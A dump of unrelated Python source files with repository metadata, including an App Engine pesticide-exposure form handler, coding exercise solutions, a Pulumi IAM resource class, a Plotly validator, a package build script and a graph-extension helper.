        # 'application_method', but it must match the HTML form field name --
        # confirm against the template before changing it.
        exposure.application_method = form.getvalue('application_mathod')
        exposure.app_type = form.getvalue('app_type')
        exposure.weight_of_one_granule = float(form.getvalue('weight_of_one_granule'))
        # NOTE(review): bool() of a form string is True for ANY non-empty
        # value, including the literal string 'False' -- confirm intended.
        exposure.wetted_in = bool(form.getvalue('wetted_in'))
        exposure.incorporation_depth = float(form.getvalue('incorporation_depth'))
        exposure.application_kg_rate = float(form.getvalue('application_kg_rate'))
        exposure.application_lbs_rate = float(form.getvalue('application_lbs_rate'))
        exposure.application_rate_per_use = float(form.getvalue('application_rate_per_use'))
        logger.info(form.getvalue("application_date"))
        # TODO This is NASTY we should consider using Date Chooser or something with only one valid output
        # Expects an ISO-style 'YYYY-MM-DD' string; anything else raises here.
        app_data = form.getvalue('application_date')
        app_data_parts = app_data.split("-")
        exposure.application_date = datetime.date(int(app_data_parts[0]), int(app_data_parts[1]), int(app_data_parts[2]))
        exposure.interval_between_applications = float(form.getvalue('interval_between_applications'))
        exposure.application_efficiency = float(form.getvalue('application_efficiency'))
        exposure.percent_incorporated = float(form.getvalue('percent_incorporated'))
        exposure.spray_drift = float(form.getvalue('spray_drift'))
        exposure.runoff = float(form.getvalue('runoff'))
        # 1-in-10-year exposure concentrations over several averaging windows.
        exposure.one_in_ten_peak_exposure_concentration = float(form.getvalue('one_in_ten_peak_exposure_concentration'))
        exposure.one_in_ten_four_day_average_exposure_concentration = float(form.getvalue('one_in_ten_four_day_average_exposure_concentration'))
        exposure.one_in_ten_twentyone_day_average_exposure_concentration = float(form.getvalue('one_in_ten_twentyone_day_average_exposure_concentration'))
        exposure.one_in_ten_sixty_day_average_exposure_concentration = float(form.getvalue('one_in_ten_sixty_day_average_exposure_concentration'))
        exposure.one_in_ten_ninety_day_average_exposure_concentration = float(form.getvalue('one_in_ten_ninety_day_average_exposure_concentration'))
        # Maximum exposure concentrations over the same windows.
        exposure.maximum_peak_exposure_concentration = float(form.getvalue('maximum_peak_exposure_concentration'))
        exposure.maximum_four_day_average_exposure_concentration = float(form.getvalue('maximum_four_day_average_exposure_concentration'))
        exposure.maximum_twentyone_day_average_exposure_concentration = float(form.getvalue('maximum_twentyone_day_average_exposure_concentration'))
        exposure.maximum_sixty_day_average_exposure_concentration = float(form.getvalue('maximum_sixty_day_average_exposure_concentration'))
        exposure.maximum_ninety_day_average_exposure_concentration = float(form.getvalue('maximum_ninety_day_average_exposure_concentration'))
        # Pore-water exposure concentrations over the same windows.
        exposure.pore_water_peak_exposure_concentration = float(form.getvalue('pore_water_peak_exposure_concentration'))
        exposure.pore_water_four_day_average_exposure_concentration = float(form.getvalue('pore_water_four_day_average_exposure_concentration'))
        exposure.pore_water_twentyone_day_average_exposure_concentration = float(form.getvalue('pore_water_twentyone_day_average_exposure_concentration'))
        exposure.pore_water_sixty_day_average_exposure_concentration = float(form.getvalue('pore_water_sixty_day_average_exposure_concentration'))
        exposure.pore_water_ninety_day_average_exposure_concentration = float(form.getvalue('pore_water_ninety_day_average_exposure_concentration'))
        exposure.frac_pest_surface = float(form.getvalue('frac_pest_surface'))
        exposure.put()
        self.redirect("aquatic_toxicity.html")
# WSGI routing: every path is handled by the configuration page handler.
app = webapp.WSGIApplication([('/.*', UbertoolExposureConfigurationPage)], debug=True)


def main():
    """Run the App Engine WSGI application."""
    run_wsgi_app(app)


if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
38b657507fa9116655cd0f1e6c4c24ea7c348d49 | a8a5b9c9c526b600b0b8395a1eaf4044355d6ad9 | /01_Basic/30_Output02(1032).py | 2a3d1b328802e1d3bc48038b9cab25e5e223e60f | [] | no_license | kiteB/CodeUp | a342e40720290758de3fcfff961813250eee9541 | f485f6c50a252e9cb6449c39a872a73561468415 | refs/heads/master | 2023-02-08T15:57:20.557421 | 2020-12-31T08:35:58 | 2020-12-31T08:35:58 | 323,678,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 90 | py | # 10진수 정수를 입력받아 16진수로 출력하기
a = int(input())
print('%x' %a) | [
"[email protected]"
] | |
b0853a9aba65d24c4142d61fcce38fcedb426468 | 2420a09930fcc1a0d3c67a0791be70ddee418f4a | /Kth_Largest_Element_in_an_Array.py | d08f8e38b151d423cded627522ff355833c7db5b | [] | no_license | Superbeet/LeetCode | eff8c2562fb5724b89bc2b05ab230a21b67a9e5a | a1b14fc7ecab09a838d70e0130ece27fb0fef7fd | refs/heads/master | 2020-04-06T03:34:10.973739 | 2018-02-13T00:57:06 | 2018-02-13T00:57:06 | 42,485,335 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,727 | py | # Use Bubble k times - Time Complexity: O(nk)
# Use Bubble k times - Time Complexity: O(nk)
class Solution3(object):
    """Selection via k bubble passes: O(n*k) time, O(1) extra space."""

    def findKthLargest(self, nums, k):
        """Return the k-th largest element of nums, or None for empty input.

        Mutates nums in place: after k bubble passes the k largest values
        occupy the tail of the list in ascending order, so nums[-k] is the
        answer. Uses range (not xrange) so the code runs under both
        Python 2 and Python 3.
        """
        if not nums:
            return None
        size = len(nums)
        for i in range(0, k):
            for j in range(0, size - 1 - i):
                if nums[j] > nums[j + 1]:
                    nums[j], nums[j + 1] = nums[j + 1], nums[j]
        return nums[-k]
# Time complexity: O(k + (n-k)Logk) <~> O(nlogk)
import heapq
class MinHeap(object):
    """Fixed-capacity min-heap that retains the k largest values pushed."""

    def __init__(self, k):
        # k: how many of the largest elements to keep.
        self.k = k
        self.data = []

    def push(self, element):
        """Insert element, evicting the smallest retained value when full."""
        if len(self.data) < self.k:
            heapq.heappush(self.data, element)
        elif element > self.data[0]:
            # Heap is full: replace the current minimum only when the new
            # element is larger, preserving the k largest seen so far.
            heapq.heapreplace(self.data, element)

    def pop(self):
        """Remove and return the smallest retained value (the k-th largest)."""
        return heapq.heappop(self.data)
# Time complexity: O(k + (n-k)Logk) <~> O(nlogk)
class Solution(object):
    """K-th largest via a size-k min-heap: O(n log k) time, O(k) space."""

    def findKthLargest(self, nums, k):
        """Return the k-th largest element of nums, or None for empty input.

        :type nums: List[int]
        :type k: int
        :rtype: int
        """
        if not nums:
            return None
        heap = MinHeap(k)
        # Iterate the values directly (the original indexed with xrange,
        # which does not exist on Python 3).
        for value in nums:
            heap.push(value)
        # After all pushes the heap root is the k-th largest element.
        return heap.pop()
# Time: O(n+klogn)
# Time: O(n+klogn)
class MaxHeap(object):
    """Max-heap of capacity k built on heapq by storing negated values."""

    def __init__(self, k):
        self.k = k
        self.data = []

    def push(self, element):
        """Insert element; when full, keep only the k smallest originals."""
        negated = -element
        if len(self.data) < self.k:
            heapq.heappush(self.data, negated)
        elif negated > self.data[0]:
            heapq.heapreplace(self.data, negated)

    def pop(self):
        """Remove and return the largest remaining original value."""
        return -heapq.heappop(self.data)
class Solution2(object):
    """K-th largest via a full-size max-heap: O(n + k log n) time, O(n) space."""

    def findKthLargest(self, nums, k):
        """Return the k-th largest element of nums, or None for empty input."""
        if not nums:
            return None
        heap = MaxHeap(len(nums))
        # range/direct iteration replaces the Python-2-only xrange calls.
        for value in nums:
            heap.push(value)
        # Discard the k-1 largest values, then return the next one.
        for _ in range(k - 1):
            heap.pop()
        return heap.pop()
# Ad-hoc smoke test: each strategy should report the 2nd largest value (8).
# NOTE: Python 2 print statements. Solution3 mutates `nums` in place, so it
# is exercised last; the reported answer is unaffected by the partial sort.
sol = Solution()
sol2 = Solution2()
sol3 = Solution3()
nums = [3,2,1,5,6,4,11,8,7]
print sol.findKthLargest(nums, 2)
print sol2.findKthLargest(nums, 2)
print sol3.findKthLargest(nums, 2)
| [
"[email protected]"
] | |
cea8f85549e20e56b361532625210c10df856781 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2818/60900/249172.py | 7ab8f518b83de81d5c00a7ebae67bc19775a6307 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | str1 = input()
# str1 (read above) holds "<subject_count> <time_multiplier>"; str2 lists the
# chapter sizes. Greedily studies the cheapest remaining chapter first while
# the multiplier decays by 1 per chapter (never below 1), summing total cost.
str2 = input()
data1 = str1.split(" ")
chapter = str2.split(" ")
subject = (int)(data1[0])  # parsed but never used below
time = (int)(data1[1])
total = 0
temp = 0
index = 0
while len(chapter) != 0:
    # Find the remaining chapter with the smallest cost at the current
    # multiplier (linear scan; chapters are removed as they are consumed).
    temp = (int)(chapter[0]) * time
    index = 0
    for i in range(0, len(chapter)):
        if (temp > (int)(chapter[i]) * time):
            temp = (int)(chapter[i]) * time
            index = i
    total = total + temp
    del chapter[index]
    # The multiplier decreases after each chapter but bottoms out at 1.
    if time != 1:
        time = time - 1
print(total)
| [
"[email protected]"
] | |
21610adcf332d720d04f4d26788b6caca4289ec7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/200/usersdata/273/81828/submittedfiles/al15.py | 1656fb72d68d08049b3e4bfbe2bfaff5a11427c5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | # -*- coding: utf-8 -*
# Bug fix: the original used `=` (assignment) where `==` (comparison) is
# required -- a SyntaxError -- and referenced `numero` without ever reading
# it, so the script could not run at all.
numero = int(input())
# Holds when half the number equals its last two digits plus its leading digits.
if numero * 0.5 == (numero % 100) + numero // 100:
    print(numero)
| [
"[email protected]"
] | |
01d0f066ebccfbcc3429bb92eb4c58c7288e5c33 | ba694353a3cb1cfd02a6773b40f693386d0dba39 | /sdk/python/pulumi_google_native/beyondcorp/v1alpha/client_gateway_iam_member.py | e411f2bc786043e5ec3c549e1882babd6062d57d | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | pulumi/pulumi-google-native | cc57af8bd3d1d6b76f1f48333ed1f1b31d56f92b | 124d255e5b7f5440d1ef63c9a71e4cc1d661cd10 | refs/heads/master | 2023-08-25T00:18:00.300230 | 2023-07-20T04:25:48 | 2023-07-20T04:25:48 | 323,680,373 | 69 | 16 | Apache-2.0 | 2023-09-13T00:28:04 | 2020-12-22T16:39:01 | Python | UTF-8 | Python | false | false | 11,706 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ... import iam as _iam
__all__ = ['ClientGatewayIamMemberArgs', 'ClientGatewayIamMember']
@pulumi.input_type
class ClientGatewayIamMemberArgs:
    """Input property bag for constructing a ClientGatewayIamMember resource."""

    def __init__(__self__, *,
                 member: pulumi.Input[str],
                 name: pulumi.Input[str],
                 role: pulumi.Input[str],
                 condition: Optional[pulumi.Input['_iam.v1.ConditionArgs']] = None):
        """
        The set of arguments for constructing a ClientGatewayIamMember resource.
        :param pulumi.Input[str] member: Identity that will be granted the privilege in role. The entry can have one of the following values:
                * user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
                * serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
                * group:{emailid}: An email address that represents a Google group. For example, [email protected].
                * domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
        :param pulumi.Input[str] name: The name of the resource to manage IAM policies for.
        :param pulumi.Input[str] role: The role that should be applied.
        :param pulumi.Input['_iam.v1.ConditionArgs'] condition: An IAM Condition for a given binding.
        """
        pulumi.set(__self__, "member", member)
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "role", role)
        # `condition` is optional; only recorded when explicitly provided.
        if condition is not None:
            pulumi.set(__self__, "condition", condition)

    @property
    @pulumi.getter
    def member(self) -> pulumi.Input[str]:
        """
        Identity that will be granted the privilege in role. The entry can have one of the following values:
        * user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
        * serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
        * group:{emailid}: An email address that represents a Google group. For example, [email protected].
        * domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
        """
        return pulumi.get(self, "member")

    @member.setter
    def member(self, value: pulumi.Input[str]):
        pulumi.set(self, "member", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the resource to manage IAM policies for.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def role(self) -> pulumi.Input[str]:
        """
        The role that should be applied.
        """
        return pulumi.get(self, "role")

    @role.setter
    def role(self, value: pulumi.Input[str]):
        pulumi.set(self, "role", value)

    @property
    @pulumi.getter
    def condition(self) -> Optional[pulumi.Input['_iam.v1.ConditionArgs']]:
        """
        An IAM Condition for a given binding.
        """
        return pulumi.get(self, "condition")

    @condition.setter
    def condition(self, value: Optional[pulumi.Input['_iam.v1.ConditionArgs']]):
        pulumi.set(self, "condition", value)
class ClientGatewayIamMember(pulumi.CustomResource):
    # Overload 1: keyword-argument ("flat") construction form.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 condition: Optional[pulumi.Input[pulumi.InputType['_iam.v1.ConditionArgs']]] = None,
                 member: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 role: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Sets the access control policy on the specified resource. Replaces any existing policy. Can return `NOT_FOUND`, `INVALID_ARGUMENT`, and `PERMISSION_DENIED` errors.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['_iam.v1.ConditionArgs']] condition: An IAM Condition for a given binding.
        :param pulumi.Input[str] member: Identity that will be granted the privilege in role. The entry can have one of the following values:
               * user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
               * serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
               * group:{emailid}: An email address that represents a Google group. For example, [email protected].
               * domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
        :param pulumi.Input[str] name: The name of the resource to manage IAM policies for.
        :param pulumi.Input[str] role: The role that should be applied.
        """
        ...

    # Overload 2: args-object construction form.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ClientGatewayIamMemberArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Sets the access control policy on the specified resource. Replaces any existing policy. Can return `NOT_FOUND`, `INVALID_ARGUMENT`, and `PERMISSION_DENIED` errors.

        :param str resource_name: The name of the resource.
        :param ClientGatewayIamMemberArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher: route to _internal_init with either the parsed
        # args object's fields or the raw keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(ClientGatewayIamMemberArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 condition: Optional[pulumi.Input[pulumi.InputType['_iam.v1.ConditionArgs']]] = None,
                 member: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 role: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """Shared constructor body: validates inputs and registers the resource."""
        opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.id is None:
            # Creating a new resource (as opposed to looking up an existing
            # one by id): required inputs must be present unless a URN is set.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ClientGatewayIamMemberArgs.__new__(ClientGatewayIamMemberArgs)

            __props__.__dict__["condition"] = condition
            if member is None and not opts.urn:
                raise TypeError("Missing required property 'member'")
            __props__.__dict__["member"] = member
            if name is None and not opts.urn:
                raise TypeError("Missing required property 'name'")
            __props__.__dict__["name"] = name
            if role is None and not opts.urn:
                raise TypeError("Missing required property 'role'")
            __props__.__dict__["role"] = role
            # Output-only properties start unset and are filled by the engine.
            __props__.__dict__["etag"] = None
            __props__.__dict__["project"] = None
        super(ClientGatewayIamMember, __self__).__init__(
            'google-native:beyondcorp/v1alpha:ClientGatewayIamMember',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'ClientGatewayIamMember':
        """
        Get an existing ClientGatewayIamMember resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # All properties start as None; the engine hydrates them from the
        # provider state identified by `id`.
        __props__ = ClientGatewayIamMemberArgs.__new__(ClientGatewayIamMemberArgs)

        __props__.__dict__["condition"] = None
        __props__.__dict__["etag"] = None
        __props__.__dict__["member"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["project"] = None
        __props__.__dict__["role"] = None
        return ClientGatewayIamMember(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def condition(self) -> pulumi.Output[Optional['_iam.v1.outputs.Condition']]:
        """
        An IAM Condition for a given binding. See https://cloud.google.com/iam/docs/conditions-overview for additional details.
        """
        # Read-only output resolved by the Pulumi engine.
        return pulumi.get(self, "condition")
    @property
    @pulumi.getter
    def etag(self) -> pulumi.Output[str]:
        """
        The etag of the resource's IAM policy.
        """
        # Read-only output resolved by the Pulumi engine.
        return pulumi.get(self, "etag")
    @property
    @pulumi.getter
    def member(self) -> pulumi.Output[str]:
        """
        Identity that will be granted the privilege in role. The entry can have one of the following values:
        * user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
        * serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
        * group:{emailid}: An email address that represents a Google group. For example, [email protected].
        * domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
        """
        # Read-only output resolved by the Pulumi engine.
        return pulumi.get(self, "member")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the resource to manage IAM policies for.
        """
        # Read-only output resolved by the Pulumi engine.
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def project(self) -> pulumi.Output[str]:
        """
        The project in which the resource belongs. If it is not provided, a default will be supplied.
        """
        # Read-only output resolved by the Pulumi engine.
        return pulumi.get(self, "project")
    @property
    @pulumi.getter
    def role(self) -> pulumi.Output[str]:
        """
        The role that should be applied.
        """
        # Read-only output resolved by the Pulumi engine.
        return pulumi.get(self, "role")
| [
"[email protected]"
] | |
c73ec83d2bc16f0e985a6026dd20b6c6936d08f1 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_95/2212.py | d949b82062698cadca5cf074e35b0245522ff71b | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | test_input1 = 'ejp mysljylc kd kxveddknmc re jsicpdrysi'
test_input2 = 'rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd'
test_input3 = 'de kr kd eoya kw aej tysr re ujdr lkgc jv'
test_output1 = 'our language is impossible to understand'
test_output2 = 'there are twenty six factorial possibilities'
test_output3 = 'so it is okay if you want to just give up'
mapping = {}
for (x, y) in zip(test_input1, test_output1):
mapping[x] = y
for (x, y) in zip(test_input2, test_output2):
mapping[x] = y
for (x, y) in zip(test_input3, test_output3):
mapping[x] = y
mapping['q'] = 'z'
mapping['z'] = 'q'
ntc = int(raw_input())
for i in xrange(0, ntc):
sentence = list(raw_input())
for j in xrange(0, len(sentence)):
sentence[j] = mapping[sentence[j]]
print 'Case #%d: %s'%(i+1, "".join(sentence))
| [
"[email protected]"
] | |
35e250ddb36f9bda71a9edb9402cff3dc7b06ecd | 1b9075ffea7d4b846d42981b41be44238c371202 | /tags/2007-EOL/applications/multimedia/xsane/actions.py | a5dcf88f3f4b48317cf764f6179f90f66eb3cf6d | [] | no_license | pars-linux/contrib | bf630d4be77f4e484b8c6c8b0698a5b34b3371f4 | 908210110796ef9461a1f9b080b6171fa022e56a | refs/heads/master | 2020-05-26T20:35:58.697670 | 2011-07-11T11:16:38 | 2011-07-11T11:16:38 | 82,484,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,280 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
    """Patch the source to use the system lcms, export build flags, configure."""
    # Point xsane at the system-wide lcms header instead of the bundled path.
    pisitools.dosed("src/xsane.h", "# include \"lcms.h\"", "# include \"lcms/lcms.h\"")
    shelltools.export("CXXFLAGS", "%s -I/usr/include/lcms" % get.CXXFLAGS())
    shelltools.export("LDFLAGS", "%s -L/usr/lib -llcms" % get.LDFLAGS())
    autotools.configure("--enable-gtk2 \
                         --enable-nls \
                         --enable-jpeg \
                         --enable-png \
                         --enable-tiff \
                         --enable-gimp \
                         --enable-lcms \
                         --disable-sanetest \
                         --disable-gimptest \
                         --disable-gtktest")
def build():
    """Compile the package with the standard autotools make step."""
    autotools.make()
def install():
    """Install to the package root, register the GIMP plugin, and clean up."""
    autotools.install()
    # Make xsane symlink. Now, it is seen as a plugin in gimp.
    pisitools.dosym("/usr/bin/xsane", "/usr/lib/gimp/2.0/plug-ins/xsane")
    pisitools.dodoc("xsane.*")
    # Drop the empty sbin directory the install step leaves behind.
    pisitools.removeDir("/usr/sbin")
| [
"[email protected]"
] | |
1697c0111932a0c9cad342f698ed370b0c72284d | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/histogram/_outsidetextfont.py | 91c57eed75e3073c405ed483e18e2d95722ed640 | [
"MIT"
] | permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 1,566 | py | import _plotly_utils.basevalidators
class OutsidetextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
    """Auto-generated validator for the ``histogram.outsidetextfont`` compound
    property. The ``data_docs`` string below is user-facing help text emitted
    by the code generator and is kept verbatim (including its quirks).
    """
    def __init__(
        self, plotly_name="outsidetextfont", parent_name="histogram", **kwargs
    ):
        super(OutsidetextfontValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            data_class_str=kwargs.pop("data_class_str", "Outsidetextfont"),
            data_docs=kwargs.pop(
                "data_docs",
                """
            color
            family
                HTML font family - the typeface that will be
                applied by the web browser. The web browser
                will only be able to apply a font if it is
                available on the system which it operates.
                Provide multiple font families, separated by
                commas, to indicate the preference in which to
                apply fonts if they aren't available on the
                system. The Chart Studio Cloud (at
                https://chart-studio.plotly.com or on-premise)
                generates images on a server, where only a
                select number of fonts are installed and
                supported. These include "Arial", "Balto",
                "Courier New", "Droid Sans",, "Droid Serif",
                "Droid Sans Mono", "Gravitas One", "Old
                Standard TT", "Open Sans", "Overpass", "PT Sans
                Narrow", "Raleway", "Times New Roman".
            size
            """,
            ),
            **kwargs
        )
"[email protected]"
] | |
7a3131ae28be4405ce5a794b47ed688f2fecf0cb | 71b11008ab0455dd9fd2c47107f8a27e08febb27 | /04、 python编程/day06/3-code/06-函数的返回值.py | 7adbf30fba433ca7320decfaec8f19bc9ce11693 | [] | no_license | zmh19941223/heimatest2021 | 49ce328f8ce763df0dd67ed1d26eb553fd9e7da4 | 3d2e9e3551a199bda9945df2b957a9bc70d78f64 | refs/heads/main | 2023-08-25T17:03:31.519976 | 2021-10-18T05:07:03 | 2021-10-18T05:07:03 | 418,348,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # # 我们没有使用过函数 带返回值
# print("hello python")
# # For a function WITHOUT a return value, just call it as name(arguments)
# # len is a function WITH a return value
# a = len("hello python") # it hands a value back to the caller
# print(a)
# print(len("hello python"))
def my_sum(a: int, b: int) -> int:
    """Return the sum of ``a`` and ``b``."""
    return a + b  # return the result of a + b to the caller
num1 = my_sum(2, 3)  # calling my_sum here, so num1 receives the function's return value
print(num1)
print(my_sum(5, 6))
"[email protected]"
] | |
98d962d303e316845b4a01a0847eb8e0c36ade3c | e75a40843a8738b84bd529a549c45776d09e70d9 | /samples/openapi3/client/petstore/python/test/test_outer_enum.py | aa195260019e50c396a5107af8708f89aed3f908 | [
"Apache-2.0"
] | permissive | OpenAPITools/openapi-generator | 3478dbf8e8319977269e2e84e0bf9960233146e3 | 8c2de11ac2f268836ac9bf0906b8bb6b4013c92d | refs/heads/master | 2023-09-02T11:26:28.189499 | 2023-09-02T02:21:04 | 2023-09-02T02:21:04 | 133,134,007 | 17,729 | 6,577 | Apache-2.0 | 2023-09-14T19:45:32 | 2018-05-12T09:57:56 | Java | UTF-8 | Python | false | false | 816 | py | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import petstore_api
from petstore_api.models.outer_enum import OuterEnum # noqa: E501
from petstore_api.rest import ApiException
class TestOuterEnum(unittest.TestCase):
    """OuterEnum unit test stubs"""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def testOuterEnum(self):
        """Constructing OuterEnum with an allowed value must succeed."""
        inst = OuterEnum("placed")
        # Bug fix: this test previously constructed the enum but asserted
        # nothing, so it could never fail on a broken constructor.
        self.assertIsInstance(inst, OuterEnum)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
6bbd7506cb05eb4e4065865fdd18cc17fcea1b2b | 8bccc05fcb3cfc6ed93991927a514a96f53f7ec0 | /example_extender/add_mention_dummy_extender.py | de5c32d684d6884597a818c80c3c1a1b17752451 | [
"MIT"
] | permissive | afcarl/QuestionAnsweringGCN | 54101c38549405d65ef22e38fed9e5bd58122ada | e9c1987b40a553f0619fa796f692c8880de32846 | refs/heads/master | 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,615 | py | import numpy as np
from example_reader.graph_reader.edge_type_utils import EdgeTypeUtils
class AddMentionDummyExtender:
    """Decorates another extender and, for every mention in the example,
    appends one "<mention_dummy>" vertex to the graph plus a
    "<dummy_to_mention>" edge from that dummy vertex to the mention's
    entity vertex.
    """

    # One-hot vertex-type row used for every mention-dummy vertex.
    # (Slot 2 appears to be the mention-dummy type -- TODO confirm against
    # the graph's vertex-type convention.)
    MENTION_DUMMY_VERTEX_TYPE = [0, 0, 1, 0, 0, 0]

    relation_index = None
    vertex_index = None
    inner = None

    def __init__(self, inner, relation_index, vertex_index):
        self.inner = inner
        self.relation_index = relation_index
        self.vertex_index = vertex_index
        self.edge_type_utils = EdgeTypeUtils()

    def extend(self, example):
        """Run the wrapped extender, then attach mention-dummy vertices/edges.

        Returns the example unchanged when it has no mentions.
        """
        example = self.inner.extend(example)
        if not example.has_mentions():
            return example

        graph_vertex_count = example.count_vertices()
        # These lookups are loop-invariant; resolve them once.
        dummy_vertex_id = self.vertex_index.index("<mention_dummy>")
        dummy_relation_id = self.relation_index.index("<dummy_to_mention>")

        # Each mention's dummy vertex is appended after the existing vertices.
        for i, mention in enumerate(example.mentions):
            mention.dummy_index = graph_vertex_count + i

        mention_vertices = np.array(
            [dummy_vertex_id for _ in example.mentions])
        mention_vertex_types = np.array(
            [self.MENTION_DUMMY_VERTEX_TYPE for _ in example.mentions],
            dtype=np.float32)
        mention_edges = np.array(
            [[mention.dummy_index, dummy_relation_id, mention.entity_index]
             for mention in example.mentions])

        example.graph.add_vertices(mention_vertices, mention_vertex_types)
        # Register the new edges' positions (appended after the existing
        # edges) under the "mention_dummy" edge-type bucket before adding.
        example.graph.edge_types[self.edge_type_utils.index_of("mention_dummy")] = \
            np.arange(len(mention_edges), dtype=np.int32) + example.graph.edges.shape[0]
        example.graph.add_edges(mention_edges)
        return example
| [
"[email protected]"
] | |
